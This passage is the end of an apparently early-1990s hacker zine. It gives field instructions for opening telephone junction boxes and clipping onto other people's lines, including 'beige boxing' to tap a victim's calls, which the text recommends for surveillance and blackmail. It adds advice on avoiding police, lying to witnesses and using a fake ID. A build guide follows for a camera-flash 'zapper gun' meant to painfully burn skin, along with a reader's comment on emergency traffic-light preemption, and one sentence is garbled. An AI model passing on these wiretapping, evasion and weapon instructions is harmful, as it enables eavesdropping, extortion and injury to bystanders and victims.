Aluminum Multi-Line Boxes: These boxes are usually found behind business buildings and shopping centers. Some condominium complexes also have these boxes hooked up to walls on a few units. Each box contains five or more phone lines. The boxes are rectangular and made of aluminum, are very easy to open and close, and often say "Western Electric" on the front. Once you get the box open, you will see several pairs of terminals grouped diagonally. Simply attach your phone clips to a correct pair, and you'll be on a phone line. Run an ANI on the phone line to find its number. If your phone happens to be polarity sensitive, and you get no dial tone when hooked up to terminals, reverse the alligator clips and you'll be on the line.

Small Distribution Boxes: These boxes, usually either light green, or a very dark green, are not very common, and can be found behind shopping centers, houses, and other buildings. You'll probably need the ratchet to open it, and a knife to strip some wires. The top of the box pulls off if you loosen the screws enough. Inside, there will be several wires. Two different sizes of wires are found in distribution boxes.
The larger wires lead to nearby buildings. The smaller wires lead to another distribution box where they are spliced in. These boxes take the most time to use because they have no terminals and you have to find the correct wire pairs. It's easiest to find the large wire pairs, so start out with those. Once you find a phone line, you might want to tape together or label the wire pair for future reference. Use the same procedure for the smaller wires. If you find a good box, and are willing to take the time, these boxes can be very worthwhile!

Medium Boxes:
-------------
Medium boxes carry more lines than small boxes but are usually found in somewhat risky locations. Most of them require a ratchet for access, and they usually open on a hinged door.

Medium Distribution Boxes: These are identical to the small distribution boxes, but carry far more phone lines. Many times, after taking off the cover, there will be a flat access plate you can open with a ratchet. Use the same procedure for this box as outlined in the small distribution box description.

Flat Peg Boxes: Flat Peg boxes are frequently found behind grocery stores, shopettes, and other businesses. Sometimes they can be found in an office phone room or in the back halls of shopping malls. They are typically big, square boxes mounted to a wall and are opened by a handle on a hinged door. Sometimes, they are mounted away from a building. We've seen some that are double sided and require a ratchet to open. Inside, the terminals will be grouped in approx. 10 X 3 inch columns. The terminals are long flat pegs. There are four terminals per row. It is sometimes difficult to hook up to a line since the terminals are so close together, but you'll get the hang of it after a few tries.

Large Boxes:
------------
These boxes sometimes contain hundreds of phone lines. They are found along busy streets and in business areas or apartment complexes. You'll need a ratchet to open one.
Wire Box: The wire box is about three feet tall and has two doors opened by one latch. The wires lead into long, plastic, rectangular grouping stations. There should be a tool attached by two screws to the side of a door. Connect your phone clips to these screws. Now connect the tool to a plastic grouping station. If you connect the tool correctly, you will be on a line. The bes contained in a single grouping station.

Terminal Boxes: In our opinion, the terminal box is the king of boxes. A single box may contain up to eight hundred lines. You can't miss these boxes because of their size. They stand at least four feet tall and have the characteristic light green color of most boxes. After opening a box, you will see many red and white numbered terminal pairs on each side. On the inside of each door, there are two screws to connect your test phone to. Leading out from the screws is a double current alligator clip that can easily connect to any pair of terminals. This easy connection tool makes this the most convenient box to use, and the most profitable.

Helpful Tips:
-------------
Now that you know how most major boxes work, you'll be able to figure out how other boxes work. By now we're sure you have thought of some interesting things to do with boxes. Here are some tips you might find helpful.

The Perfect Box: The most tedious step in field phreaking is finding "The Perfect Box." This box should be located away from streets and hidden from the view of homes. When working on this box, there should be no worry of being caught or observed. Finding this box might take quite a while, but don't give up hope; it's well worth the time and effort. Try looking around waterways such as creeks, lakes, and ditches. If you have easy access to wilderness areas, such as the mountains, try looking for Perfect Boxes around there.

Beige Boxing: We're not sure exactly who invented the beige box, but it can be extremely useful for surveillance and blackmail purposes.
The only materials you need for a beige box are two wires and your test phone. Connect the wires to the ring and tip of the line you want to tap. Make sure your wires are hidden, and lead them to your house or other location. You then can connect your phone to the wires and listen in on conversations or use their phone line however you want. Make sure that you don't use a boxed line when the victim is likely to pick up his phone and hear you.

Safety Tips:

o Well, first of all, be extremely careful when choosing a box to work on. Two of us got arrested for using the wrong box at the wrong time. Make sure that nobody will see you when you're working on it, because you're putting your record at risk. Of course, if you're under 18, you don't have to worry quite as much, but going to court is not K-Rad.

o Try wearing gloves when working on phone lines. You don't want to get shocked or leave fingerprints around.

o If you ever open a box that has huge cables in it, it's probably a power box. The power box is usually dark green and stands a few feet in height. Don't even think of messing with one unless you want to risk having a painful death. If you absolutely *must* disconnect someone's power, then use *EXTREME* caution when disconnecting the cable. Wear heavy duty gloves, make sure that you aren't wet, and don't use metal tools.

o Always look for your boxes at day, and work on them at night.

o Have a getaway bike or car ready in case of an emergency.

o If anyone catches you, act cool and calm. You don't want to say "uh, well, umm...well I was just uh...," because that makes you look suspicious. *Always* have a story ready *before* you start opening boxes! This has saved us a couple of times.

o You might want to incorporate your fake I.D. card into the scheme so people think that you work for the phone company. Remember, this won't work on telco employees. Only attempt to fool average citizens. If they call the cops or telco, take off.

This concludes Manuscript III.
We described most of the major phone boxes so that you'll be able to figure out how other boxes work.

=========

-=How to make a ZaPPeR GuN=-
-=By Panther Modern TNO/TBF=-

The zapper gun is kinda like a commercial stun gun. It is not as powerful, and is mainly used to piss people off, not to put them down. It will scorch skin very painfully, if applied. Total cost for it is around $20-$25, and it is a fun thing to make if yer kinda bored. If you don't know what a capacitor is, read no further, go find out what one is/what one looks like, then come back. Anyway, materials are:

--------------------------------------------------------------------
Qty   Description                            Approx price
--------------------------------------------------------------------
01    Disposable Fuji-Film FLASH camera      $15+TaX
01    Small-Mid radio shack projekt BoX      $2-$3 or so..
02    Dry wall nails                         10-20 cents
01    Radio Shack SPST Push Button           $1.50
01    1 Alkaline AA battery                  $0.50
--------------------------------------------------------------------

This is to make a fairly nice version. For the raw, crappy version, all you need is the camera. I won't even go into details on making it, you can figure it out for yerself.

--------------------------------------------------------------------

Okay. Get the camera. If you want, take some pictures. ALL OF THEM, or none of them. Cause if you don't take all, you'll ruin the film.. Now, when yer ready, first, rip off the cardboard. You'll have a plastic box. Open it up, as well as you can. Be very careful not to damage the circuit board, wires, flash, etc. Once it's open, discard the plastic case, and the film. Now, looking at the circuit board, one can see a fairly empty space. Rite in the middle of it, will be 2 small copper "plates." Solder your button to this place. You may also remove the flash at this time, as it will be shortly rendered useless. Also, you will notice two protrusions of copper strip.
Pull 'em off, and MAKE SURE they aren't touching when you finish, cause it will ruin the gun. Next, put the circuit board in the project box. Drill one hole so you can see the LED. This will tell you when the gun is ready to FIRE! (When the LED flashes). Next, line up approx where you want your two tips. Line up the capacitor with this. Drill holes. Next, drill one last hole where you want the button. Now, remove the generic AA battery in the camera, replace it with your hi-quality Alkaline AA battery. Now, stick the nails in, and solder them via wires to the two capacitor leads. Seal them in place with either epoxy or hot glue. Now, wire up your button, and stik the LED in the hole you made for it. Close up the box. Your gun is made.. Just push the button, holding down for approx 2 seconds until the lite flashes, and touch whatever you want to SHOCK. This gun is semi-lame, but is also fun, and good for boredom..Have PhUn!!

=========

Comments on Phrack 42
by Karb0n -=TNO=-

Ok...I was reading a little of Phrack 42...in the first part of the issue I read this short post on turning traffic lights to green on your side.... I'm here to tell that fucker that you cannot do that anymore... Maybe where he lives you can...but not in Colorado.....he must have had an old system. Now I'm sure there are a few old lights around 303 that can still be used that way but...the metro area is not possible....I'll explain:

There are three different ways to change a stoplight in your direction to green.

1) Manually Activated Devices: Traffic control devices of this type operate by a switch that is manually held until a Fire Engine or Ambulance clears the intersection. This switch can be set up on an automatic timer that interrupts traffic flow until the apparatus responds, then turns the light cycle back to normal.

2) Siren Activated Devices: The siren of the Apparatus or Police Unit activates this traffic control device. A sound pick-up unit is located at each MAJOR intersection.
This unit filters out all other noise except the siren and sends a signal to the traffic light selector in the control box. The traffic light selector holds the yellow light for a few seconds (to let cross-traffic pass through) and then switches to red..which flashes at double the normal rate. A lot of people think their car horn will set some of these off....no! Not true!

3) Light Activated Devices: (This is the one that d00d talked about in Phrack) This type of traffic control device is activated by a Pulsating, High-Intensity Strobe light that sends a signal to a detector located at each major intersection. This detector holds the light green...if it happens to be green when you're going through it, or speeds up the normal cycle to green in the direction of travel...(note: This means there is a RED light on three sides and GREEN only on yours). There is an indicating light located next to the light detector, assuring the driver that the traffic signal is in control by the strobe light.

Ok...The name of the strobe light system is called an OPTICOM. The key word in the upper paragraph was "HIGH-INTENSITY"...normal cars do not have high intensity lights...even when you put your brights on. The OPTICOM flashes at over 14 times a second...it almost looks like a regular solid light..but nope. If you guys don't know what I'm talking about...next time you see a Fire Truck running with lights and siren...look at the top of the engine and you'll see it flashing away...actually..I think it's the most noticeable thing....

Note: Police cars do not have these on them....and only some Ambulances. The reason Cops don't have them is because they have a car that is easier to maneuver through other cars and intersections. But a fire engine..with a lot of water and very heavy can't turn on a dime...you'll be screwed in a second! So that's why Fire trucks have them and cops don't. Some ambulances do...so keep an EYE out for it.

Karb0n -=TNO=-

Greets-
Cavalier: Have you come up for air yet?
Dead Kat: Was I abducted?
Nuklear Phusion: Dude... the Delphi died.

=========

CONCLUSION
~~~~~~~~~~

Well, that's it for our first issue. The next ones should be a bit longer and probably more technical. We hope that you found this publication both useful and interesting. If you have the urge to write a text file, please contact us at Flatline. The number is posted on many BBS's and many quality hackers have the number too.

If you have any comments about this file, please let us know. We are more than open to suggestions on how to improve this 'zine and would appreciate feedback. Look for issue number 2 on a quality BBS near you!